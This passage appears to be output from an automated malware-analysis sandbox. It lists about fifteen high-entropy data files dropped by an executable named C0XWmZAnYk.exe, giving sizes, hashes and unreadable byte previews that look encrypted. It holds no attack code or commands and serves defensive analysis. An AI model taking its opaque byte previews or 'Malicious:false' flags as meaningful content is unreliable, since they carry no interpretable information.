.^....7.'..B$.cB..O...F..L.N.P.....M..{Q..G(W..+...{o3.".'_V.~w.9W.E<x3....qY"i.iNaMB*5...=N..Vc&..Y]B..b...C..s...T..../C:.0..Y....h..q.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):5298
              Entropy (8bit):7.965952612044586
              Encrypted:false
              SSDEEP:96:5bqWAEogpzhozP6I6HGTMTJ3yxUURadQvWMdvQKHno/HZOP+rLaaERViSu:5x/pzc6oTGJH3WdvQL9zaVU
              MD5:2DC9315E72B93980ABB6E981F2FB25CB
              SHA1:FC1E60363DA04DE062AA47A0F5BF30DF1D83190C
              SHA-256:DDE3A9B2D81FCF5FEF67EFF21E8014C47FBE68E0E6B7912100290317DDCE6A07
              SHA-512:D6BAFD9F3159CE7EC06098B3E54769850B695F3EA39536BFF99929B4489851E88666FB5A90F8E3BD8B003319F3D27FBF743797DF5A574C08E021814A5CEC5F4D
              Malicious:false
              Preview:{. ".$dR.H.5...F.x(2..q.m..Q.ff&..m!8....7..V[J..6SO.j.....>.d[..H.......>qc:M........z.R....$.Z"..0..G..l..q...._u....=.?...f.!..j.s....O..^..`...y1.&..$.........5....b..?..:..t..(4)k....4u...<9.n.h.U.,O......m..4..\.......@.z. 5.c.j[.dG..-h....'.NB.......)G-...]..^.....e....y(....B./f.vq.....;..Z.....:7...f.9##k.6.Ts'dxk..k-...aB./P...uK5j..K..>...h.. ...x.t...R.....h.....AUG..kI.@<w..I...J..G.._.....tEOd.O..r....I.. %..rG...Y...._.4."1.X.7..>.&...E..v....%..D...).OW.h([..m...DDMr-.EXA....ku..Ca$.q..F...^>......F..kW.3.oM..F].#Xc..%E~~.8,.:;u....j..TW.>..A?.6.U.W..)5@..T.7.m;..Fx.O.B...]%..8<_...e..Bx..:..)ZT.....09IU....lU......]'{..o*q.xp.z]$o....h.bY6.E...S..D;O.a...}.0...T(..n..@...Aj....8C.....tm.T..8.}C..Tx....ycZ..s.......9..F.V.*._.(...lm9.O.W.jp..!.E.r.D..%565.9@=z......A.....l.."yzO2.d.N.Fx...<.q....^.+..32S..IVd.|FMQ..P.VX...JI..o:...].."..P.+n......d.... |n... ....w.].N.{.............EZ.Ur....:q.Z..........w..\.@.q.aW.9+P].......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):5374
              Entropy (8bit):7.958663464753155
              Encrypted:false
              SSDEEP:96:7tzB0sP8hb6H9kOCW0bNAD8btGW4oX55uadiZBCsEFk9Lu28/CpXbxphTv:5dYWHL0pADmGAXb0UFk9LL1NbN
              MD5:18830880BB8B03815008D3ACDBC5D211
              SHA1:37CF19DCD19085CDED3F9D4EB38DE2164B8C5B59
              SHA-256:18E7629412B36ED10D96A5B82765ECE317DFC8D74061CD603BBB846320AEEC64
              SHA-512:9FB4B690DD05FE24F5D868A24292E3943261914D9C3B94656958D9CD6B32E6A20B53FCD36298D2E6056506E727C176FABECD88705A79D4A9999D9220792E998C
              Malicious:false
              Preview:{. "&F.|...S.4./[j_.......i....1#.~..R....c.A.fk..+.B.M..Cq.&U....%t..\....8.3 .g..(....;.oy.'.u..D.{;..R..`..Q[.......e.......,.....X..Q.9V.j.^....>{..iC........_.....E......9.8Y.:_...+d....n.e.R~.W.......6.l...K....S...}..Kas.._.....U".U..!1:4.....B..(b...L1\.... ..2;8..`(.j..E...t..*.B..d.R..v..."...MS%..4..C.c.cXb....cJ..5..N.%{.....%.<+.....1..C.....5[.n..V..n.,..y....WW<g...Y@.~..W0.D..x....gEn.w........ ...w.V..."..H..P.>.....4...>m.S~.B...R..e..I..15..=.o...A.h.80...E.7...&.ybqQ....O9..l....H.c../i.....,......S...V{..".4{....!....b..;c..8)...Oi...p....nm.{!9...+.....qZ.I.p,#9Ij.k...r+)..g..e..qb.....B^3.o...V..M.....1$....|".U...oC...G..b..(.1.M..6(...UFD`k?.g..=.g+..dC....S. ....u..mlH...4..!l.N...m;jK..}Qg.m...W........H.......IS.#.e...@...0........sG.B.......&hc]>..X._Ty.`....W....}.a....-.j.....-...(rq....l....|...h..4....O..5t2......;.:......`.,..!\h..V..2..L.D...ULF.......=.k.e...L0B1..$....^8z.L.-.zWd...h"|io...g.*.KC...a.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):11026
              Entropy (8bit):7.981323522679818
              Encrypted:false
              SSDEEP:192:vlHwK0xT9n8qDfaKo0AfdSiJGB+gSq8yaynPuoaAa+B6GMuq2MD942wxp:RGTdNzaoTiJGB+gSq8ya0213Q6SMJ4p
              MD5:2353FB9DDEFA412633E1B986E9DFD8A2
              SHA1:D1C7E23D6EA4840B0E09BDA9E4CA04A6FB19E9E8
              SHA-256:FD396E936FC54FBDB091896265B0ADF6B03391DF17576E83C3790D8AB3AEE5BC
              SHA-512:A4BED3FD5FE630BC7B1894A453063A1E87C8F25BC7A6581914D91BBFDD4AB377073C5A7853BD3F3C266E8A62133632FB26398320ED2BB46243A61FF668067C7B
              Malicious:false
              Preview:{. "Y\(O>.v..".....iT....>.....y..C.).j....s.V../-e..!f.G...._P(1...._.o.(".WI...u.....2!....Qy.'g.w.. _U..1_B.x.....Ji..z.3.Mu.....B.Y:.P.3j@. }...>.r?.v@..&.?.i....qN|..m......#..!........Z.$'.Q.....C..B;...a..B../.Dy$Z.h..'...../.8u.g.4..<..D.G.c....%hw.5y......Et..h............X..B..i..K.HA.P.a..&.i..f. ^.wi;.P..E..\........?{._..#.....H..<5w.1..#u8.\...G.)..?h]"..m}q..).}t...)...F.."....r>...g..7..*...........)<^.....E~.G;...._>.FHxPL9.I...y..Cd.....}.3.Wx..1...;.].'....xF...;7rh&..;3q....._D.=g.5...e.......mD........_u..[.<...sf...r.S..>.=q...AgT.M.2.!+..P.a&.....y.|P.).v..p....go..#..v.5.?r.W.C.d...L&J=.....q}.c.8$..yH.K,.......1@c..X....0..X.p.qF!..U.}.".^....X}...c...(Z.F..v..u....NP..y.7..#.s....(....'.,mPc.L...Y...v..\u.[......:....S..%cu.~)..p............w..{../...hnd...._....K.Zr.........7.@V?~..t...=.8.+...7Sx...l,....7./......R.3...D.3...2<..A.,.B..(i\.BY...E+=M..f.c....`,..Y>I..V..o...~.-u.L.?.2D.....A....:...t
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9516
              Entropy (8bit):7.97878147556316
              Encrypted:false
              SSDEEP:192:zY0vymMtEukKYVWyDGclKrR2sRukNU0/sbwF+G8:801MTkgKlKPUkb/tU
              MD5:54A02D999869F767B0DF3B1B3FFF7375
              SHA1:4B9C6F420094F3076112CD44BAD7BB4D7CE4A25A
              SHA-256:656580A94B0B275945C2D3A96CE42A0FFEA2A80E68E67126E79CF328BFD3113F
              SHA-512:99242D9FE4512A1ABA5DDB73BF6AF2AA5814242061341F44D2F09B44C5B04B864B0137BC34CC26044CACF6AA4D1C571FAA27A4EB07183C848E26F98F143E6F18
              Malicious:false
              Preview:{. ".b*?3..z...F..R`....VU......S/......,..et.....g.4>0c..D...L.dH&C.&...$..-.g.S U>......qn.9.>%.o..wFuzJ..%...._...'.:,=~......dH]@...,...9I....@..C...k.{....C..[........"c.n&{./.3[<c.8-.<.....Xxg..(M......'.fl^'.&..}.=.......i_..Pz. pcO..D..Z....{6_)..0E..L..N......nF....b....>.#...K..>o.|Q#Y.q.8.7!..d K...B.F..9..,.....L.....d.......Q.......M;vd.{....J.T... B.L....q.U....9V....#..W.x..x.c b'9.:..l..N.J......q..!....*...^..I.;...S...^v..2C..l.wa...4...,.zM..j.8....L.v...+p.....C?H...$...2...M.."Oe*6...[..F..........<.~q.r.L.R]..)z..;.<=..+..-e.h.FC..!.........'E.*t...Z}......7Yy.@.C-.....5f..e.@K..J..D.Su.."h.we^.S....k22.'.#.b=d..."9.......D.n.zJc.Vx"U.(t...b...F..6.6w....F........>#...\...z.".."fXc.....-...]-PN..@....C}.htwG...?u%g.Q..Z.-...{.Q.*..8l...P.. R.}.A.........p,..~F7%.5.......+U.F*L.T.I.A..Q-....{I.u.6e.V..d..d=A.x.>..W..+...%.k..=5/....8T.Q......6.4@m&4i.?%....&7n...6..,4|...{",J...U.=....bIk"...t!_...x..F<..3Mm+.)]..v0s.w.2z.z.E.m
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):8202
              Entropy (8bit):7.975435601434861
              Encrypted:false
              SSDEEP:192:JEEZ3kUpIbx25udWbuesCmZA8arksPndZqQIu1a:JEEZUUped8uumKusfTHI
              MD5:E0CF86B699DCE68E725A9C32770E07F6
              SHA1:267D5BF06B0EE9B54A040FB318656AC7F7A894F4
              SHA-256:F94DD3F3418B080F06FEC32212571074EAFCC076D6539C4886EAA082259E6926
              SHA-512:C31F53374201FD47E3571F9A9F476C5A915504BF86C6C6FECE3D96CF841819DD62F7EE384784BBCD41743A71C08AA2D70F82489157348233C4E860CCA684DB01
              Malicious:false
              Preview:{. ".....M.}./IdI.]3h.D....*HV.*$.8."..qz.c.losU.$.h;4N....V4..=&t...{).>p.o...B8..f.L...R.W...43.Q.J9$h...V.....8.x....{h..].r~$...O.fl..+.X.u~7L(..~.fz\..d.xc4g.w.4....|s..;.... `*..|.,}.6H..B....F..}?....t..Z.o....../O...)...,.X...A.K..Ns.*...E_...y.O6.nR...r..sD'.....L.#e..V....=.H.i.....cH..`...&.(...l.w.f.j...@.oA.`2..WX.....L..(..x....b..03..l..5.L`...kn.?...xO+..gH.U...p!p1.4%k...-.#.'...0-+...?..F.R.X@...H.."a._..C&N.l...K.C....\GAu..d&|qQ!zx.J..e."....S.v.%....x.....~.......Wd3S..{Gi.8."..\S:...f;ZE.;...TkH.U..`...e.8/sW.-w..Yl.e.....G..{.rL.d$.........K..3V>.u...-#Y.}...."....Z.R..<....\.9W..]..".............1>_..Y......k..EQb.....+..a.l....<:...S."...k.,AX...i..q..=f.....v.V....Q...N.....I3.*H..["..]....yz6.........T.<0.n*k..+.p..[._@.\.%N....p_WHC.{...y.....k^L.......L......J..'0:.....=99..QSl3..}.u.]P..69Qg*$$.kV..G.h.Z.....m.W*.$..>.o.%....O.)...,.B.".tk.....4..G.H...p...........td..D........[.e.zN......9.......UA.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9235
              Entropy (8bit):7.980313593376344
              Encrypted:false
              SSDEEP:192:Ua3Xyj+0DodAHv+1UXvJL5WDFmVLUR+B36D6PvV1ie91xzlL4tK8:pO+Yo7GLcDQLUIBqePv3zlL6K8
              MD5:E3ECC74CF279D279E69047E202A51217
              SHA1:546FE6D9CE6BEA0CA788F069886C2EB1BBDDBF62
              SHA-256:457DC19A6C2D2D0C526E764291C24DA0D71D37B54789C6BAB4999E04F4C57106
              SHA-512:DC06763C32D3C68685C9327744B6F1A06AC4D7E2B8189F7161F9C6BBB91ED8BC273BB0D285676E1E0AC59B47F22C91DCDD6A0FD2B0B4243A9F68FFC18E460E64
              Malicious:false
              Preview:{. ".,5jy..........P.m$...B..T.6,.7........._...[..8..*.E.9.w...u..F1...N..#....EG_:...i.gXY.....I.N.D./....pT_..<..f...C[_u..h.n...a..\..n..^..@.9t....=b.@....2....g....g..S.4.E.....gNI!.|?.4..Z.a...G.?....Z&.)...W..'f.\..f.B...x.j.C..Lv....@.G...4..D.......q..........*.Sz..'.e.......g.Z......L.C>\..G].r%.-K...i].J...H..V.hGA.:.i~@hoz.Oq.. ..-...xl..6....r.yMq.EF*..f..9.,....S...p..:. .....nZ.T\...r...4.......isZ..%..Qj6..IQ..:.....F...GoUz.h.'I|.[.W....;.........,....N.U.o..x.5.....]C..!.e.PI...a...jU..o.m...p......m....k.[G..5..V.v...,EBP.-w....T..0..g............Ip.......@r.I........Ll...2....@.6.Z .mQ..!..B.:4..0..c......AM..{.A1..4a..gIL..,.D....g.C..<p....:..Qr.......7r..........H.{..H.[.R./........?...i4G..~{.t..V...?,..%Y..r...>...H;(Aku...b......3).......}.n..*1......-.t.n.d.......wxZH.8..,.8'.s|.z.D....@(.8.Q..g.......c....:..ORofb.....{..z.6.[....\.;.....b...V........N...s.u..Q.......X.b..@.u..}..3..../.U!..q.L....~[I..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9849
              Entropy (8bit):7.983081356094469
              Encrypted:false
              SSDEEP:192:DK8NUS4dMaj3oNHE9ZrdoG8J89mJtar2Gm/fMt1CScIk1pAhSg++s:DK8t4dMaj3pZrj8JFtaKvMt1zcIk1pAM
              MD5:8961A786B46BFECB6AD3740FDF483216
              SHA1:8ED37A8F093EB2C73D0F2E6ED47D3C977957E4EE
              SHA-256:BA650DCAD76BAEB6AA49BFECDD1636539913E0D12B4CB11D6CBF2D98C4E28569
              SHA-512:243FF83BB9E5BCC2E68FE65724252952283504252EE40EE76FAD5286E04036E5175C20E0BC7DBFEC8F9E25087452C87CD57993FFBE853D0406BDD42DAD3AA8F3
              Malicious:false
              Preview:{. "....F(....}/...8....a-.D.4...Z....zA..v.M...^....Bk..H9#......8.2.)...|.[jL......w6.Z...cL_.......E2L.Pw5.k.a....w3....z.... iH..qI:c<..M.r.O..%NR`..."_..U..t:}...M..3.KX~...[..?m;_c..g62.K...X.n5dA.....|QxH3']..81..=..n..R*k..W..&...."H.}.#.Q<l:|,(..RN.0......b....c.js......`.6.......rG....#.*.3,...v.6hI....u.........A..3W.F{"=......._a.....Cp.(...x.o[z...=..&.Tp.q&9...!L.[T......!a....s..;;...,.4c...g..C.T.T..Z%"...|..<........$.b....T1.6.<.."..W.-.1y.!...3.#.CL.wL(..Ju.u...._.QwIJT....,..2....eX.v..|.#.).Z.h...Ujg......i.{X..s.ZC{U!kB.X........bL&.....sl.$.Js..jPG......]@...d.....R.......P#m.[5....3..!V..a%.JL~.(...T...mn..;.".8.Z..a.;......\.J.G.X...l.....u.A.....IU*'">...w...[.....u...j^.`F.qa..T#i...BZ.X......}8.T.'...W~8.g...e....v....E.y.Q....9......5.a.Y..,....N..G?...../G...r I.S.g....r\..|....Pvdj......8......{....y=.....P,T+.&..1QSIh.Z..Q..a.P'.>..q.e$".......z..UL...>.....A.7..r.].(5.....T]...8=O..].{.`...N. D~
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9848
              Entropy (8bit):7.978676793133246
              Encrypted:false
              SSDEEP:192:Y3aRfubmK8O6qmAaDJQ2bO6Igez6t5E4T3tBy0WRcVOHZ/w:sXC5O6qPuRa6IFC5PhcRRdZI
              MD5:1FD887F28DF401CA609D262FFDF5C43E
              SHA1:706EA20EADC82F9D49BA0ECE14ACD65ECBCAA342
              SHA-256:5E4264DD1E728FB72B260DE508CE27589D8ED2B995116FD75871DD1C31BF26A1
              SHA-512:43E5D4BD588EEF107776D3031E42EC3165779DEC1D6741047C2B200CDE267A824E8B2F0703E4EC5F798737D0610C5A4B6F53D50AAE7EB03E1F1594EE2195B35F
              Malicious:false
              Preview:{. ".....{..""..O.......Js..... ..-_...?.p.|=cqtQ..C.S......i....3`.....*A..Q......#...Dv.c...5...I...jg.f.AM..dYt..?8...&U.W.4<R>Q..Nhw$......G.K..GB.t...@.f....+.W.-ok.a........"...C.p.:#.(...+R........X..b..W.....@k.;..2.z3Y^2.[....z.~.T.,X.o......\;......%......*.f..k.lD....y`;....887..T.x......n^.?)G...wr.~...0P.n..q.8..0....&....r....r.`xqN.K.n.W../...e..9.|....T....[.P.Rx.r..W.........^z...2.D%..K5..a.TKM.V...6..B.5.5,j..`.|...G...l...E...[.H..$z...>...P..|Z.....7|..'....#..u...O ...} .. p..Y....v.r[*.y.8..(A...(0. .Y...`.......d...l..=.QY%].D.#....E.O._.3..v(j......Oy).KQ,-...>...Z.......d...F.....E17>BI.S...+u.6....q.+....(i.$..w.d.......v"lT...m...........E._s....q]..b..~.0Q.Y.g. ..|M.~.`..*I..Lm.S..U.Q.u..7...1.gc..2.S.m.....%.........{...G..:.......Z..^.:..8r..y.p..@}...".G.<D9V`U.[.3......FV[..4.,..kB...S.?...SI.......&.V.....%. ....F..~X*0...J...=...vzU/.`..>.._.".>=T.QK.+.q..[wE.|..oXE..p....#.....:9....KwR.g..D..L.:
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):8741
              Entropy (8bit):7.97715603007856
              Encrypted:false
              SSDEEP:192:xg+w7DzAs3eWlkcHQaD+RgGZ5a4+bOWJIcwnVB:xKnzb3jlJwaD+Rg85PKwnH
              MD5:7ADF69BDD174D4E351D4C3ABC991DC83
              SHA1:6D6165D3B807B41F4B013090006E67B1B7E70C5D
              SHA-256:C917E4ABD53015FB5F3CF2EC01E971C5A7C061213AA4FBC61040B038F3B3941C
              SHA-512:3E13CF3D8AD27FF72206FEBAD04297B25CEF80F2AD8E9CF34DCB3BE2758535327EBEA9BF1A463982EBBCEC2DBD5F946CCD88D923ACC2C60EC40FADBA3924657C
              Malicious:false
              Preview:{. "H6M.I..mh..V/P.=8.b{6..%.\..!}...?.8 ..x..2a.\.=.`8.d...y..l....i...0.)......o~......1...E:.e.[..g..`.Kp..Lvt..fjE.._.1~..../....\jv...xL...t....H..f.x].B|.-..>......T..A/:{...I....}...h..e...*.Z....Js.}.)...H.U.l.l..C...;"..p.&...%^....j..F...a,R\.....y....Un...H...(..`..5..W~.&!..zq.'..2h..._,.Izl.R..."...B3.SCi..9.y\..=G....B....fd.....'...r..{.%.9MQib...w...=x..A......&.f..n..J..xs?6c*Q.5..p=+rVH..>?W...7..(..`.? mS....8-}M.Z..H.y..........af%*<L.g.t..6\.&....2&a}......4#6.tq........Po..w6...~.T.K.8.k...?(:.4..f.i.T=....).d.~HW..>&.<.kVI...c.M.P$.U........0~..:...A.U......JCD.....0.Yr..#.]..nd.)..I.9.8..,2.T..M...W..P....'v.E.+.i...].z...SF.j....#33N.5.X.Z=Oc.....G...k....'................)4.G|.}...qo..."G....{....H...N$.`{...g=.,b...p.R.+&`q>3.y"....*o./.T....7..k...NB..,..w..D..P..YP>..V.es.w...lE.5.%d..%.`....^.b7...,...s..V.'.B..^g.OG....h=........?H...;././$.k~E|B.$..*.J..C.........[Q.._.....U.l.jm.c.(~.!..u..d......w_..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9110
              Entropy (8bit):7.978192973327941
              Encrypted:false
              SSDEEP:192:rfJWQAwA3QcPw232gOO88a4Q/ggX4Ft+zYu+MKy5x6Qt1pn7ccsKu:rYQAV3QE2gRaT/J2UzwMPv6Qt1p7ccsN
              MD5:0A737D527DC919574DBEE6D8F2652272
              SHA1:098E397CFD277646665E1CB7FCFDBA18034B970F
              SHA-256:554CB713B9EF1C57D7D9650BA3855B45A7259601BA8F28DB71E2F8DCAB4746C6
              SHA-512:0556A3DD73C51B97E38F384A1FE8AE48A3EBB5F11B1568651D2349040CA29F6473277616E64C80263BC801C6F9296D98F6FE85CA52C62FCB183AF66DA0EDADFF
              Malicious:false
              Preview:{. ".{.a...~^...U.aE!.'..`B....a.5..`s. '...gK]9&..........c.....aNm.*>".Y2.4....y..WnEH.CN...%.`....w.....o.g].L.........1m.ZU.....FT#.F.e....c...\....V.|LU...k.r.7._..dBK2i/..6M#J..;p..74M..w..7..H..'..v.ra....48...._.t%7....../$ *.X..=..K.OI.....I"..$*.........%.%...Q.....cM<fN..x.C.z.<~..+....Kf.~r.#Z.n.>.T.i.n.|......g._...mz......`Y.UN.n9~K{o.F.... .{.%.o.{..%...H.P.1.......5.-K.....M...#.....$.{.rwNR.C..m`Us..q...z..Ub.Xo...h.2:.....$fOWm.&.#.\(gM... yyWj?.-FQ`/.=..`fk..y..:D3.u...RnX@.,...,Ym.C..:.._.U..B|.n<...|.=V....V#..1..`c..&...@..@.Lrufx.....P#4&...+...2\n..^.mx...@Bk.....M.F.@......X...)..u.Q..9.;G.....ms.rvG..^c..M?_......8...Oi.._A.rbX...u....I.H..s....*2..../R9...H......M;._..;L....o.[....,..HH.{oH.^...f..nV...X..>..~H^.D.._.qE*..~.E=.*...{t./*#.....RR..nZ.y..r..D..3."x=...h.....4U.s.9#Ni.W1^m..C.:..s.F'\.......-.d...YCk..h..O.V.+3p..:.>1..X."@..'7..A.o.....;h].f..._U.v....V.M.(.vy..p.x..j.8tP..-..$...]'}|...b
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):10300
              Entropy (8bit):7.982301353544674
              Encrypted:false
              SSDEEP:192:AVm55LkoGsOlbwzLA9zyZH7mJNOdyzRLoQS1Q+cIiw3q998/IJg51V2iLEv7JFGQ:AMt9KczLo8mJNdRdEjcIiSegQiLEvFhn
              MD5:D338CB043F4767D167906E32607AE49E
              SHA1:7B221F86DFE16549FC686DE33C3A3AF1A065F627
              SHA-256:A4FB7AEB279263645653E755AABCE2CF49C3743C31A5EEC22C582950CDAA6D65
              SHA-512:E20348EC18F5C94CB68DF8121717247F927DB26B7BA0D85641A949306C6875CFBC4D87C5573C512BCF851096B9C74DA17B5EA86513A6E2F6FDB02ECED26B458A
              Malicious:false
              Preview:{. "..Z...j^'%.....+.j...Z.>..$\L..8{%j.B.V.a6p~.bE~..I....^X.....*u...3^.......t..E....y.g...R.~%7...r..U>.. ........w.3...g...Z.!.P1....z.g..`'/K.}.p.OI..R......d.I.)@E.....I.f{R1.t..x<..t..p.2...`.p7t[......(.2...*..AA..W..\).^Qa......eAM..OC0j.....Ah........#.'.d.B.!.r(...d...n..c*...P...|.D;2gP.[+..T~..h....D..R...Qvh.....J%.V.8..=m.O......c1.;....X*.{.(.y....1y.....f.3./..'..;.+.......,...7.....7EK.."Q-...z.yF.;....q.[..{x..3..F....%7..V@..e..=R..?.d"&..U...q.A.E....=N.........D...9/....,]..6.f./.1..K._W..j..f.]...v.)6.........F.Fn.A.$.BW...(.%...,.y.....=.......6Z..l.S.'.......a...Y.R...R?....~...\..+...bD.....r"..]5.R..g.(.LH..x....zI...+...=.tc1....aS|z.H...PF...h"Q..%.y.>.Y2S~.5..k.)..j..S..a.+.)....6&.P.HO'...LH....M.J.;....|.......2.#..nX.....M.........dt?.Z.m....}jEF.F9.. .P..!.........XX.2Ar...q.:.Okz..P.3A....'R~pn-..\..2...q..)k..9#FUJ.@..E.;$#...VgC......b@}..L...<;..w<.....s...."...=,*..NK...Rz.;.k+b..(R..x$.d
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9053
              Entropy (8bit):7.978261149448131
              Encrypted:false
              SSDEEP:192:Dkg31OTwhn8F5ulmo9bIX6Kur4gcKsuCVDyD3fMYv++t5LS:DNOcFao79y8cK8lyLMu13S
              MD5:445037070054AA56BB0774A510B4B333
              SHA1:2E09A54B9E8DF125F9FB71B642F1D938319B779B
              SHA-256:C2D4895CBE2075DC60C80E829B4EA305E3E674C42DA3D9D7ECFCAAA6BD58F345
              SHA-512:A49A4F6CA50E00B6CCC8D3CC61FD30B912FDA02C1B29AC407AD78886F5B9DA6E308BE6359281F8E65CBD95E68CB838C1F0F095008059E49537A9729E16DE5FA8
              Malicious:false
              Preview:{. "..sk'6(.G.f.P..:.s...a.%.b.z...f.C..R...@cq...s\..1.v.II.......:.A.G.R...R....r..H....)..U...I..^. .....).5*m.V..^...k..XAG..{......Q.K......... ..........X..<..@-...l.){..bT#,%..-.*}...-2......oEn..b=......r.....5.~....1.....~.?.y.M.B1.........1k+.Hxds.......O..H3...7b..W.(.).:..L.l..RH.n....qU*...5.z.+.S..M.....6h.U..~....:1.`.\...`..sCA...C~...S........D&+V......U...K.8.U....x.@;.....H...gR;........p[..V^..osf.ami.9.........Y=.z......R.h...?..F.e,y..%...*..%..%...^.C.[...RQ....J(..........,.....d/.jwk.8PL%.!..c....g.~...dqq..^.c.QY.:_..#..r.d..../X..:)..J..c".F...../.Ku..J.YZ...7Wa.A%L#[...]...|.....[..G... .8....s.F..7....o..X.K~....z.........)F=..Q.d...V$..r...,<.%..OfR.tS@..B..q.Z.>..1.C...S].A.O].>tn.Aj......!<a.c..}..%..e.w.A..&...6".~.C..>,..R.c..Z.../.(5.........x&.]0..B.|9a|k..x.W...R..G.i.BP...M...O......}......~h"..}...7.D.......Y]..}*.W....i.......J.[..w1..Z'%.m......V.Z.jeh.t.7;A...I.M.T........RL.*.d.9M.De..`..]ilB..b
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9254
              Entropy (8bit):7.979832308822715
              Encrypted:false
              SSDEEP:192:sep4/YcUDwbo+lnE2qrOBlPt+63ayhK3+lj6lngQwAa3Bpt5f+pTTS:jo4DexE2qrO3F+63ayU3+hV5GpTTS
              MD5:77C3647937DC59B10E82E99DD130A362
              SHA1:99E414DBC1E49A83DE73B9B089788660AB23745D
              SHA-256:6F0069D08E66429297F0096BD8C4064FE59CA660C73864B4044F21BDA49B6951
              SHA-512:23DEB02085801F49E1E9B30149236960937E31659FAC5373FC0E8CA93696937036829797BB6ACF62A1454DCED6BB5D99A8BEEDAEC95DB5F59A889E2489F5AC50
              Malicious:false
              Preview:{. "j.$+.yu....P.p.......4,.Ss..q.."......../..?....c[..>..J..R .].........v}A............G.....}.@..:!...lc..d.Ys..S..ST.A..^q/.F.......n...w.1..VW......[..&."...c.%....s2.....<...4....ekht.u.-Q".n2.._..`..._U..x...i&.....5=...t_'..>VL.|..c.;2......V|nz.p.e..I|v'^....wn.og...82]..T.pc...mms..-L..]...A....o.e.......k.X=...a*6..B<.d.$.8...Q..p.FV........`.f..{..0..b.m.ij_.v..n..\.....,..I..ii..h:.d....8...........[r..,U..k..N...H..!.p......n.......|+w..v..P..;&.....A.EY...KR.0.4.Q..\..."F....x.e...J^07.$Zs`....!Y.@......W.2.$.F_..w....>T....j..X#..9D..D..4.Sg........+..p..Rzk.Br...b0..z........t.z..>. @..2..Jz8..C.d..X.7Nzc...*]....^.*..1....Gm.c.-6.....y.fV.h.u"8H..`!../..v.:..w}.$...}.:.....3.U...6..J..+j.;........-..S.n}....qc...aH...R...\`...v.3.x../..M.....l..Jr...l,pW...,"..:...!...A...I.(..D.O.$^..&...sS.p2..... 0.._.?.jvJ........~.....pl...y7...t..q.4..I_.Su.....M..jC....-...5...:..P.n..-.e...D. X..p...xz..F$.,.i.c.oZ.RF.1..e{..p...4
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):9397
              Entropy (8bit):7.977615860371137
              Encrypted:false
              SSDEEP:192:7ivGzd6LvwD9sw6NXQCESeQ+uqyHvgVyJyXB3MYa3AKAXwUi0nASA:7i/whZYX4a+uqyPbcXWY0oqGC
              MD5:E115D961595012C1202EE932E4D21865
              SHA1:6A76961462EA4C160466A7AAAFF23A63748AC83A
              SHA-256:2822CD02AE6D74A24D68A83351E96A9E5C95403639800A324DA206B8CE0DAFA0
              SHA-512:7619D0D740164660E2A0BABE269DDA97ABBED3D0599A0EE96F67467E35C2288D8DD26BD989150BCC0B7C89B8A99F2273AE3A7274C064F193FEB556DAF91C3B89
              Malicious:false
              Preview:{. "..Td?P.`....a..i...V.u.(..@.}.4....9.....,a...hu...H... +...P.@..KX....a .j.....P.Q.......P.S.p..t..A.w.\5!..............2..$....U..t.$.:...9..A.K.i'.W.W.B|.....~.8.:*Q...)..}.WB.. ..|..P..]{..-.........J.....E..]..{M..l).DIm.:KLY..5$....T Gx.$..,.L........A^.+YJ.;#.....:.!...u>.}......v...yJ......+...2..;/UL...PEM.+1.|.Y .........O............T.i.vD.M.#..J..w{.PX...`...?^.d..8....N..7.ge.5v.4q..d..{.l.t..H.@.....Dv....A@H.v.E.".?,...........~\....{..mW....o.9.AO@.M`...-8..d8q.y.8.@..m*.V}z..8........}....vaEu...@........V........p..Z..CW.x........H...<.....D....).8id./....G#}........S..T.;9.....[.N.p.PCS.....k.C..CmF.}..B1.p...*..:[z.....=.`w,t..qN....w.kq..p..s...U....sx..KO.._...r..cL..A....A...2......'R..w=.~-U,2I-.r.]wU.G....k1..L...g..JrNE......J..Y.oX.sE.....lA..+.7n...u.[....2....R..w.L.j....yT..5VAHy../....Dp..4Q3!`.......m. )...QNK,,]_.D.n..%.d.m}...~D}6......dBb.c..D$9.......@..(c...Pw..<i....*...P.u.q...Zx"..#..&K-.'
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):12649
              Entropy (8bit):7.985842637991502
              Encrypted:false
              SSDEEP:384:Bi4etXN06Ds8LIpbpaEVnKfkrRQvzFNMN:BitXN7wKGZKfiQvz7MN
              MD5:25AA50F45B817CA2D4F521D29DE06E01
              SHA1:7E6E7FEAFDF37216B53CDA4D41264EE109199A27
              SHA-256:768CF04908AE52E2EA6F4F4C66CAA199B7C0E9AAB381E8832CA61496321D95D9
              SHA-512:D697E88CE16E0A6AB5BD431DDE7AC8D018977D9067844872361F0515AC189B7AAE401F247CF636C583D5ED860912F7F01665DC4FA5FDDA48CDD93BF6C3C2A781
              Malicious:false
